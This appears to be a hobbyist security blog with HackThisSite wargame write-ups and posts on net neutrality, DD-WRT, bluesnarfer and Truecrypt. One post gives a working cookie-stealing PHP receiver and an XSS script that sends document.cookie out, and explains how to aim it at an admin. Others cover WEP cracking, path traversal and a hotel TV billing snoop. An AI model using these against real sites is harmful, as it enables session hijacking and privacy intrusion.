Identity Protection

"What Exactly is LifeLock Identity Protection?

Identity theft is one of the fastest growing crimes today. By now hundreds of thousands of Americans have been victimized by this kind of financial crime. From kids to adults to the elderly, no one is spared from identity theft.

If you get victimized by this crime, you will work very hard to get your life back to the way it was. Your credit score will be ruined, lose your home, and some evenSign Up Now for Lifelock! experienced getting imprisoned for a crime that they didn’t even commit.

If you want to protect your identity and you want to prevent becoming a victim of identity theft, then you may want to hire LifeLock. LifeLock offers total protection from identity theft. It is a company that is dedicated in providing you with a guarantee that identity theft will never happen to you.

In fact, LifeLock can even guarantee their services for up to a million dollars. If you become a victim of identity theft while you are in a LifeLock customer, they will guarantee your good name up to a million dollars.

LifeLock is one of the leading companies in identity theft protection. Even if would be thieves get a hold of your Social Security Number, you can be sure that LifeLock will be able to protect you.

So, if you don’t want to become a victim of identity theft, you may want to get protected under LifeLock. With LifeLock, you can be sure that you are well protected and keep your name as well as your credit score clean." -Lifelock

For those that are somewhat concerned about identity theft. Personally, I'd just keep my stuff to myself, and shred important things. I suppose once hit by it, I may change my story, but until then, it's worked just fine for the last twenty something years.

New Threats!

"At the DEFCON hackers' convention this summer, two researchers showed off a way to take control of a laptop through its wireless connection. The attack didn't target the operating system; it sought out specific flaws in the software that managed the wireless-networking hardware." -by Robert Lemos

What does this mean to us? Though this is just a software vulnerability for the hardware, which would require software updates. But what if it was a vulnerability in the hardware's firmware, which would completely bypass the operating system, making EVERY system a target. This is somewhat like the change from phreakers(hacking phone's and telecommunication systems(who faded out)) to hackers(who found loops, and holes in software to make things perform in ways they weren't originally designed(not crackers)). This makes me wonder if we'll soon have a new breed of hackers that will be concentrating strictly on hardware issues. If so, the new exploits will be rather difficult to protect against. Short of firmware flashes, which 90% of box owners either A) don't know how to do, or B) are too lazy to do them.(*EDIT* Obviously firmware would still be in the same ballpark as software, but hardly anyone ever upgrades firmware, thus making it a longer wild exploit :/)

I will be keeping an eye out for these types of hacks as much as possible and keeping the blog updated with them.

Fun with Hex Editing.

For one of the missions on a site I head over to whilst bored, I was to find out the cd-key of the program, to register it. I was thinking it would be a little more difficult than it was, but to my dismay, it was rather easy. First, I grabbed the first hex editor I could find, and opened the app that was given to break. After a quick ascii search for "cd-key" I found it. Yay! Took longer to grab the hex editor than it did to find the cdkey :( Hex editing can be used in multiple ways:
According to Hex Editor Wikipedia:
"By using a hex editor, a user can see or edit the raw and exact contents of a file as opposed to the interpretation of the same content that other, higher level application software may associate with the file format. For example, this could be raw image data, in contrast to the way image editing software would interpret the same file.

In most hex editor applications the data of the computer file is represented as hexadecimal values grouped in two groups of 8 bytes and one group of 16 ASCII characters, nonprintable characters normally represented by a dot,(".") in the ASCII part.

The standard Unix shell command used to display (though not edit) a file in hexadecimal and octal is od."

So, by using a hex editor you can change just about anything you want. For example, back in the day, I used to use a hex editor to change spawn points on maps for a game I played. I won't dig into the things the 'bad' guys can do with it ^ cdkeys*cough* so we shall end it with this :D

Comcast: Friend of Foe

For those of you who have Comcast internet, you may want to take a look at the following:
Comcast to FCC
Also, here's a recent Bill, that google has some say in, that relates to comcast:
Google cheers anti-Comcast legislation

An excerpt from Network Neutrality Wiki:
"Network neutrality (equivalently "net neutrality", "Internet neutrality" or "NN") refers to a principle that is applied to residential broadband networks, and potentially to all networks. Precise definitions vary, but a broadband network free of restrictions on the kinds of equipment that may be attached, on the modes of communication allowed, that does not restrict content, sites, or platforms and where communication is not unreasonably degraded by other communication streams would be considered neutral by most observers.[1][2][3]

The possibility of regulations designed to mandate the neutrality of the Internet has been subject to fierce debate in various fora. Though the term did not enter popular use until several years later, since the early 2000's advocates of net neutrality and associated rules have engaged in mutual campaigns of propaganda with broadband providers over the ability to use "last mile" infrastructure to block opposed internet applications, and content providers (e.g. websites, services, protocols), particularly those served by competitors. Neutrality proponents also claim that telecom companies seek to impose the tiered service model more for the purpose of profiting from their control of the pipeline rather than for any demand for their content or services.[4] Others have stated that they believe net neutrality to be primarily important as a preservation of current freedoms.[5] As Vint Cerf, co-inventor of the Internet Protocol, has stated, "The Internet was designed with no gatekeepers over new content or services. A lightweight but enforceable neutrality rule is needed to ensure that the Internet continues to thrive." [6]

Critics, meanwhile, call net neutrality rules "a solution in search of a problem" and believe that net neutrality rules would reduce incentives to upgrade networks and launch next generation network services.[7] Others argue that discrimination of some kinds, particularly to guarantee "Quality of Service," is not problematic, but highly desirable. Bob Kahn, Internet Protocol's co-inventor, has called the term "net neutrality" a slogan, and states that he opposes establishing it, warning that "nothing interesting can happen inside the net" if it passes: "If the goal is to encourage people to build new capabilities, then the party that takes the lead in building that new capability, is probably only going to have it on their net to start with and it is probably not going to be on anybody else's net.[8]"

In a June 2007 report, the Federal Trade Commission urged restraint with respect to the new regulations proposed by network neutrality advocates, noting the "broadband industry is a relatively young and evolving one," and given no "significant market failure or demonstrated consumer harm from conduct by broadband providers," such regulations "may well have adverse effects on consumer welfare, despite the good intentions of their proponents[9]." In turn, the FTC conclusions have been questioned in Congress, as in September 2007, when Sen. Byron Dorgan, D-N.D., chairman of the Senate interstate commerce, trade and tourism subcommittee, told FTC Chairwoman Deborah Platt Majoras that he feared new services as ground-breaking as Google could not get started in a system with price discrimination.[10]"

Post some comments with your thoughts on network neutrality or lack there of. I want to see how others feel about this subject!

Fun with your DD-WRT

For those that have a DD-WRT flashed router, here are some funs things you can do with it!
First off, here is a firefox addon that will show your routers status in a status bar!
DD-WRT Firefox Addon

Boost your wireless signal
Go to the Wireless tab in the web interface followed by 'Advanced Settings'. Scroll down to the 'FXmit Power' and adjust accordingly(as the DD-WRT manual states, it is "safe" to increase it up to 70) Personally, I wouldn't want to fry my router, so I'd set it at 70 max ;)

QoS
Throttle bandwidth for things that are more important that others such as games over torrents. This is something most routers don't come with, but luckily you have a DD-WRT router right? :D

Cracking WEP
Using wepcrack on your DD-WRT, crack other AP's (please note this should never be done :P) Just set the storage of the capture files to be on a samba mount.

More to come once my brain works a bit more!

Blue Update!

I just received my bluetooth dongle! Yay! Again, we have the little problem of my phone being verizon thusly can't use OPUSH. So, I can't use bluesnarfer on it. Going to have to find someone with a different carrier and an older phone. But here is me bringing up the device, and playing with bluesnarfer(obviously for those who have used bluesnarfer I'm using the wrong channel, but that was just to test if my phone would even pair with it, which it did and I purposely entered the incorrect pin to cancel it. And for those who haven't played with bluesnarfer, the part where it's saying:
bluesnarfer: open /dev/bluetooth/rfcomm/0, Connection refused
bluesnarfer: bt_rfcomm_config failed
bluesnarfer: unable to create rfcomm connection
bluesnarfer: release rfcomm ok
is because I entered the incorrect pin and it disconnected :D)




Once I find a phone to play with I'll post some tuts on how to use bluesnarfer :D So anyone looking to donate, shoot me an email and we'll talk!

Funny Quote

I was randomly cycling through my normal forums before hitting the sack and ran across a funny quote. A guy and his wife were sitting there, and he looks at her and says "Make me a sandwhich", she says "What? Make it yourself". He then replied, "Sudo Make me a sandwhich" and her response was "Okay." It made me chuckle after reading that. Hopefully a few of you get what happened in the conversation :P

Cookie Stealing

Let's first start off by describing what this is, how to implement it, and why you need to protect against it.

Cookie Stealing:
Cookie Stealing is composed of two parts: a Sender and a Receiver. The sender is basically just something that sends the cookie to the receiver. How to implement a sender will be discussed later. Now a receiver is something that receives the information from the sender. Although this sounds somewhat simple, it can sometimes be complex.

Implementation:
The following is a sample PHP script for a receiver:

< ? p h p
\\Tells the web server to use php(Please note it isn't filled with spaces normally \\this was done due to restrictions on blogspot)
$hijackedcookie = $HTTP_GET_VARS["cookie"];
\\Takes cookie from the sender and stores it
$file = fopen('cookielog.txt', 'a');
\\Opens the text file and stores it as a variable
fwrite($file, $cookie . "\n\n");
\\Writes the cookie to the text file
?>
\\As with most languages, it has to tell the server it is done with the program it \\was using prior(IE < / h t m l>)

Now, that would be placed on some remote server. For our example we'll be using localhost as to not actually point to someone's site. Now that we have our receiver, we'll move on to a way to get the information sent to it. On to the sender. The following is a snippet that can potentially be used to steal the cookie:

< script language="JavaScript">
document.location="http://localhost/receiver.php?hijackedcookie=" + document.cookie;
< /script>

Now the tricky part, is using the above to grab the cookie. This can be done by, say sending the administrator on a site a message(of course js has to be enabled on the site, and allowed. Not to mention the site must contain a user to user messaging system) Now once the administrator opens the message, the script is ran, sending the receiver the current cookie he is using.

Security Risks:
It is quite obvious that this poses a huge security risk. If someone gets a hold of a cookie, they can pose as that user. Which would give them all of the access rights that said user had on the site. For instance, if done to an web admin, the hijacker now has rights to view/delete anything and everything on the website that the admin can from a browser.



*The above information was gathered from multiple websites, but mostly http://www.freakwolfe.cheezyfilms.com/

Extemporaneous Linux haiku

I found this on another blog and it made me laugh, so I figured I'd post it ;)


(1) alloc_bootmem_core
many atomic bitops
it boots very slow

(2) testing to find oops
my tty's can't refresh
big kernel lock held

(3) buffers are dirty
all RAM I malloc'ed is swapped
bdflush won't flush

(4) the disk light flashes
sort by partition offset
all it does is seek

(5) run the test again
it runs ten times slower now
ZONE_DMA's full

(6) O of 1 is good
to get my CPU back
but kernel deadlocks

(7) dbench is not fair
aa somehow goes faster
what's wrong with rmap?

(8) Aunt Tillie is dumb
ESR wants to help her
why lkml?

(9) Athlons have some bugs
phone numbers on IRC
wow AMD called

(10) struct page is bloated
64 gig tries to boot
my kernel panicked

taken from http://csociety.org/pipermail/plug/2002-January/007940.html

Image Steganography

Just as a little insert in between waiting for for my bluetooth usb, I decided to add this little tidbit. This could have just as easily been found on Google, but here it goes. Say you want to send a file to a friend, that you don't want out in the open? How can you do this? Encryption? Yes, but then they have to have a decryption tool. Here's a quick way to do it(on windoze). First, we take the file we want to hide, and zip it up, we'll call it file.zip. Okay, now we download a picture, we'll name it img.jpg. Okay, now, we'll hide this file inside our picture. Image steganography. Here's the windows command to make this easy:
c:\>copy /b img.jpg + file.zip newimg.jpg
Now we have a new file called newimg.jpg, if we open this file, it looks identical to the img.jpg picture we had. But if we look at the filesize, it is a bit larger now isn't it? That is because our zipped file is now inside of it. Let's see if we can get the file out. Using winzip or winrar we open the newimg.jpg file as if it was a normal zip file, and voila. We have our hidden file :D Have fun with this information, and don't do anything I wouldn't do ;)

Blue Update

Good news bad news. I've successfully hacked my razr v3c and changed a few things. Such as enabling OBEX xfers(usb etc.) and such(although Verizon razr's don't allow 'push' due to not having the right protocols(woot go lame Verizon)) Sweet custom lcd backgrounds and such :D Okay, on to the bad news. Apparently Verizon is using a somewhat newer technology called BREW (Binary Runtime Environment for Wireless) which encrypts the files for each phone making it impossible to transfer said files to another phone(at least not at the moment.) Sweet, cool, thanks Verizon. So anyway, using blooover and such wont' be possible on my phone seeing as it is a Java application, and at this time I haven't been able to find a jar/jad -> brew converter. So, until then, I'll be searching ebay for some cheap BT and Java usable phones to toy with. And my BT usb should be here within the next few days, I'll try bluesnarfer from my pc with that once it arrives.

Blue...

Well, I've recently been doing research on bluesnarfing, bluebugging, blueprinting, etc. I have just ordered a bluetooth usb device from ebay, and will be testing out some exploits as soon as I receive it. I'll keep you posted on the security holes and such I find as I go through it. Hopefully it will be here by this next weekend. Until then, Live Long and Prosper!

Google Addons

Not much in security, but I decided to add a search engine on the blog to link to google, and search within my blog, in the event it gets large. I also added a banner with content related ads, such as obtaining a CEH, etc. Thought it might be useful for some, if not, oh well, it's there if ya need it :D

Truecrypt

This is the info posted on their site:

T r u e C r y p t
Free open-source disk encryption software for Windows Vista/XP , Mac OS X, and Linux
Main Features:

* Creates a virtual encrypted disk within a file and mounts it as a real disk.

* Encrypts an entire hard disk partition or a storage device such as USB flash drive.

* Encryption is automatic, real-time (on-the-fly) and transparent.

* Provides two levels of plausible deniability, in case an adversary forces you to reveal the password:

1) Hidden volume (steganography – more information may be found here).

2) No TrueCrypt volume can be identified (volumes cannot be distinguished from random data).

* Encryption algorithms: AES-256, Serpent, and Twofish. Mode of operation: XTS.

I personally love using truecrypt to encrypt data. Especially using Linux at home, and vista at school. This works out perfectly. So say you have something such as passwords and such that you just can't seem to remember. Truecrypt them! You can make a volume(just like in virtualbox, vmware, etc) that is just a file, set to a specific size, then all the data you put in it through Truecrypt is encrypted using whichever algorithm you so choose. Now here comes the fun part. With truecrypt, you can make a volume _WITHIN_ a volume. A "hidden" volume as they call it. Also you can use files as a key, so even if someone gets your "volume" it would be very difficult to get the contents without the "key' files. This is just a little info I thought I would share.
(Please note in some countries the use of encryption is illegal, check your local laws :D)

Google

Well boys and girls, I've lost top place on google. Oh shucks. Don't know how I ended up on #1 to begin with, but oh well. Just thought I'd put that out there. Again it makes no difference in any event.

Google Temp Ban

If you kiddies get one of these... You've been berry berry bwad :P Google Temp Ban So, Apparently using "inurl:**** ***** *****"(this isn't what was used as input, but for safety reasons, I'm not going to post the exact code) in google to find open webcams, is something google doesn't like. So, in short, don't do it! And forget you saw this here o.O

As an after thought, I removed the exact google hack, in case any of you try to use it.

Google.com

I was bored and did a google search for my blog, trying to see how far up it is, and blamo! It's #1 :p IT Security Blog Not all that important, but I thought it was sweet :D Also, to those that actually view this, leave some comments :P Getting bored of logging in and not seeing anything :(

IP Octets (011010010111000000100000011011110110001101110100011001010111010001110011)

First off the binary in the ()'s is ascii binary conversion of ip octets :P Anyhoo, a buddy of mine brought it to my attention last night that most applications can use just three octets as opposed to all four. So it would be w.x.y.z for four correct? I hope you said yes -.- Anyway, so to make it three it would be w.x.y*(256)+z. So we thought hey, how far can we go with this. So we tried making it just two! w.x*(256 squared)+y*(256)+z and it worked! Next I said hey, I'm a genius lets try figuring the math for just one! So, w*(256 cubed)+x*(256 squared)+y*(256)+z. And of course it worked! So I decided to write a shell script for to do this. And here is said script for those of you using *nix instead of windoze:
x="$1"
x1=`echo $x | awk -F . {'print $1'}`
x2=`echo $x | awk -F . {'print $2'}`
x3=`echo $x | awk -F . {'print $3'}`
x4=`echo $x | awk -F . {'print $4'}`
grr=`expr "256" "*" "256" "*" "256"`
y0=`expr "$x1" "*" "$grr"`
y1=`expr "$x2" "*" "65536"`
y2=`expr "$x3" "*" "256"`
outcome3=`expr "$y2" + "$x4"`
outcome2=`expr "$y1" "+" "$y2" + "$x4"`
outcome1=`expr "$y0" + "$y1" "+" "$y2" + "$x4"`
echo "------------------------------------------"
echo "Input IPv4: $x"
echo "------------------------------------------"
echo "Outcome with 3 Octets: $x1.$x2.$outcome3"
echo "Outcome with 2 Octets: $x1.$outcome2"
echo "Outcome with 1 Octets: $outcome1"

German Trojans

So, apparently the German government, after banning the creation, ownage, and usage of "hacking" software, they decided to create their own Trojan's to deploy to spy on the citizens. They are even thinking of jacking some Skype lines. After speaking about ethics and such, I would say that this is some major BS on their side. That's like the patriot act listening in on our phone conversations and reading our emails. Yeah you can catch a bad guy that way, and get in the lives of the good guys too. I don't think it's very ethical. In my opinion governments need to stay out of the civilians lives. I know they are there to "protect and serve" but I mean come the @#$% on... This is going a bit off topic, but I'm not a big fan of my government prying into my life. Anyway, back on topic. "Hacking" tools are being banned in many countries now. So what will this do? This will make the good guys trying to learn, IE Pen Testers, not be able to keep up with the bad guys. The bad guys that will have these tools whether it's legal or not. In short, government=blah, HACK THE PLANET! -hackers movie :P

Google Hacking Database

For those of you who care to learn more about using Google as a tool, rather than just a search engine for finding your favorite celebrities gossip, I decided to post this link. It is a Google hacking database, containing all the sweet little snippets you can put into it to gather anything from passwords, to company secret documents. But, as with most of my blogs, I would advise you to not do anything I tell you about outside your own network. Here's the link: http://johnny.ihackstuff.com/ghdb.php
May the force be with you my young padawans.

Non-techish Hacks: zwei (german for 2 o.O)

Another great non-technical hack that I found was in hotel rooms. I won't delve into great detail on how to do this, but basically, there is a way to break their security within about two seconds(depending on the speed you can remove a coax :P) on their television channels. After doing such, one could watch any channel they could if they had paid for it, as well, as in larger hotels, when a customer views their bill, it unlocks a specific channel and sets it for their information, now if we pre-hacked our room, we could change channels and hit someone's channel that was unlocked and see their billing info. Now, with that in mind, say they have that new spiffy internet through t.v.? Now we can see what they are doing on the internet, may it be viewing naughty websites, or viewing their bank website and logging in. This is obviously a, 'Do not try this at home, kids' subject. But I found it great to see some not so technical things such as this. I hope to find some more articles similar to this.

Non-techish Hacks

I was bored and randomly searching for some interesting info, and I came across an article on no-tech hacking. It was a large article on shoulder surfing and dumpster diving. After reading this, I realized just how too easy it is to let someone get information from you, without even knowing it. It gave me a new outlook on social engineering. In the article, the author listed a few things I never even thought about. For instance, looking at someone's laptop at a internet cafe, you may notice, a bunch of stickers. This will explain a lot about a person and their desktop. For example, if you see 10 cat stickers, chances are they may have a password that has to do with a cat, be it their own cats name, or name of breed of cat, etc. Looking at their desktop is an easy grab of information. Most novice users don't change backgrounds for example, that right there will show the current operating system. You can also check their taskbar for running applications which will show you possible targets. There are tons of goodies sitting on their desktop most of the time, for ease of access. So all in all I would say this was a great article, and I'm glad I stumbled upon it.

JS Final

Okay, this one, just as the others was easy, but tricky if you don't think about it for a bit. Looking at the script, it is quite jumbled. There seems to be a bunch of functions. Now, we look for the one that's actually used. Now after some searching we see that after post, it goes to a separate script, so we now look at that. It has 2 different variables, unlike the one before and it checks to see if _your_ password is equal to var1+" "+var2 which means 'var1[spacebar]var2'. Ok, let's go back and input that password. Voila, simple, and finished. :D

JS5!

Okay, this one was a bit different. We used a new function called unescape. The objective was to unescape a string which was the password(the unescaped version that is). So this was quite simple, of course to find that we needed to use the unescape, we would view the source, which showed us variable=unescape('%21%43%blah%blah') and we want our password to equal whatever variable is. So, we look for a text unescape utility site, and input our string we want unescaped. Voila, simple as most of the others, we now have our password, and have completed the mission. WWWEEEEE!!!!

JS4!

Okay, after about 20 minutes of trying this one... I finally realized the answer and wanted to bash myself in the head with the keyboard :( Basically, the challenge is, make your password equal a variable. And the variable is set in the page. You look in the code that they placed and you see "+blahblah+" == "+blah+" Now, you would think that to make your password equal blahblah it would be blah, right? Unfortunately no :/ The +'s around them mean they aren't used. So, that means we have to find the blah == somewhere... okay, let's do a search within the source. There we go, we found blahblah == passwordhere. So, after the headache, it was right there, just not out in plain site :/ So, the lesson learned here? Sometimes things aren't always as they seem, and try to look at something as a whole, not just the piece you _think_ you need.

JS3!

On to JSM3! Okay, so this took a bit of math, and a bit of js understanding. So, it was a bit tricky, since at first glance the math seemed easy. The math looked like this: ((5+(6*7))%8)*2. So, to me, thinking math-wise I would assume it would be 6*7=42 +5=47 /8= 5.875*2=11.75 Now, math-wise, looks good. Only problem is, in js the % symbol doesn't mean division. Well, it ~ does, but it doesn't, it means divide by this number, and the remainder is the answer. So let's go back. 6*7=42 +5=47 %8=(47/8=5.875 which would leave remainder of 7) so %8=7 *2=14. So now, the js checks to see if the password you typed is as long as this value, which is 14, so we just type out a 14 character password and BAM We win! :D

JS2

Okay, reposting JS2 due to it not saving for some reason... Anyway, basically for the second mission, all you do is disable javascript and it's completed. So, yeah... I was hoping it would be a bit more difficult? Guess not, but what can you do :/

Javascript Missions

I decided to try my hand at JS. So I selected the first JS mission. It was a bit TOO simple. The scenario was, that a girl, VERY new to JS wrote a script, that checks a password, and if you type the correct password, you win. If not you lose.
Or for you geeks out there,

if pwiscorrect = true then
win
else
lose
endif

And moving on :P Basically, view source of the page, find her script, and within her script, she has
if (variable == "string")
{
win
and basically, you want to win right? Of course you do, so you input whatever the string is to make it equal, and BAM we're done. Too easy drill sergeant!

Java, SQL, PHP Oh my!!

In the second mission, the objective was to get the source code of a site, using their script, which will post the file contents of whatever you input into the box. Okay, well, so if we put a filename in the box, it would only show something that is in current working directory. In the sample, it wanted something that was _not_ in the current directory. Here is the function:
$blarghonkhonk = file_get_contents($_POST['filename'].'.php');
(again variables and such changed as to not 'steal' from the source site)

Ok. So, as I pointed out earlier, the function will only grab a file _in_ the current directory that the script was located in. So, the file we want, is 2 levels above it. Here's where knowing how to navigate through a filesystem comes in handy :P So, two levels that would be ../../ Okay, and we wanted the index.php so the answer would be:
../../index
Voila Completed! In about 2 seconds (or however long it takes to read the objective)
The first time I read it, it sounded a lot more complicated than it actually was. I was thinking you would have to use RFI or Remote File Inclusion. Which you would have to input thesitenamethatshalnotbenamed.x/index.php So, there's some extra reading for those who care to learn a bit about RFI's :D

Update to HTS

I couldn't do a few missions here in class due to it being on campus and the rules that apply there. So I decided to stop the Realistic simulations and move to the extended ones. The first one was rather easy. It was a simple buffer overflow. The achievement was to crash the program. They give you the script of a C program, and an input box to put what you would use to get the program to crash. Easy huh? Here's the given script:
void tuxownsyou(char *str) { char noob[60]; strcpy(noob, str); }
(I changed variables and numbers so not to violate their policy on copying in part/whole of their site)

Okay, in case some of you don't know how to complete the buffer over flow, it's quite simple. If you look at the array of noob[60], it's saying, put aside 60 bits to hold the information passed to the array. Okay, now the overflow. There's no check to see if the string entered is larger than 60, so we enter a 61 character string, and voila, program crashed, and the extended characters passed to live ram. (Correct me if I'm wrong?) Was fun, but WWAAAYYYY too simple. Next stop, mission 2!

Also on a side note, this website grades your progress. I believe you start off as a "noob" then a "script kiddie". <--- Just hit apprentice. And <--- = noob. So if I can do it, _you_ _can_ _too_!

PHP Injection

Now, after finishing the 10 basic missions. I learned to use and abuse SSI's as well as do some javascript injections. Now onto the Realistic Missions. On the first mission the objective was to make a band go to the top of their ranking list. You are able to vote from 1-5 for the band. The top band had an avg of 23 votes. So to bring our objective band to the top of the list. I used Firebug, a firefox extension, and changed the max rank from 1-5 to 1-1000 and submitted my vote with my 1000 option. Doing this threw our band above and beyond all the other bands. And hurray!! We win! There is another way to do this using php injection. But as with most things in IT, why do something the hard way, when there is a tool that will make it easier... IE Why do something a thousand times, when you can make a script to do it for you? I would still like to learn about PHP Injections, but I couldn't seem to get it to work correctly. Perhaps I will try it out some more in the future.

Cryptography

Just finished mission 6, this is a quote for the mission, "An encryption system has been set up, which uses an unknown algorithm to change the text given. Requirements: Persistence, some general cryptography knowledge.". Basically I took their encrypted password of: 78585ghj. And on their site there was an encrypting script that will encrypt whatever you put in for text, so I obviously started with a-z1-0 to see how the letters lined up. Then I realized, whatever the first input character was, stays the same. So I also noticed that the letters incremented by one each character. So I thought, hmm first one is the same, next is +1 in the alphabet/number. So, logically
"7 8 5 8 5 g h j" would be:
- - - - - - - -
0 1 2 3 4 5 6 7
= = = = = = = =
7 7 3 5 1 b b c

Javascript Injection!!!

Well, I spent the last 15 minutes attempting to finish mission 5. The point of the mission, was that an administrator, setup a script to email himself a password for the site, in the event he forgot it. It was to be sent to his email: webmaster@hulla-balloo.com. Using a Javascript Injection I was able to change the email to be mailed the password to my own, thusly giving me the password when I hit the 'Send password to Sam'. Poor, poor, Sam. Never knew what hit him :/ So this was a fun one. I learned something new and somewhat useful. I also learned, never put a script to email yourself a password in the event you're too lame to remember it ;)

Hackthissite

I decided to take a smack at hackthissite and begin the hack bootcamp. After about 5 minutes I've finished the first 4 missions. The first 3 were extremely simple. But I am sure they will become more difficult as I go on. So far I've learned some people just don't think before they write a website ;)

The Beginning

Got a textbook from AC. I plan on reading some of it today, and slapping some information on here of what I learned.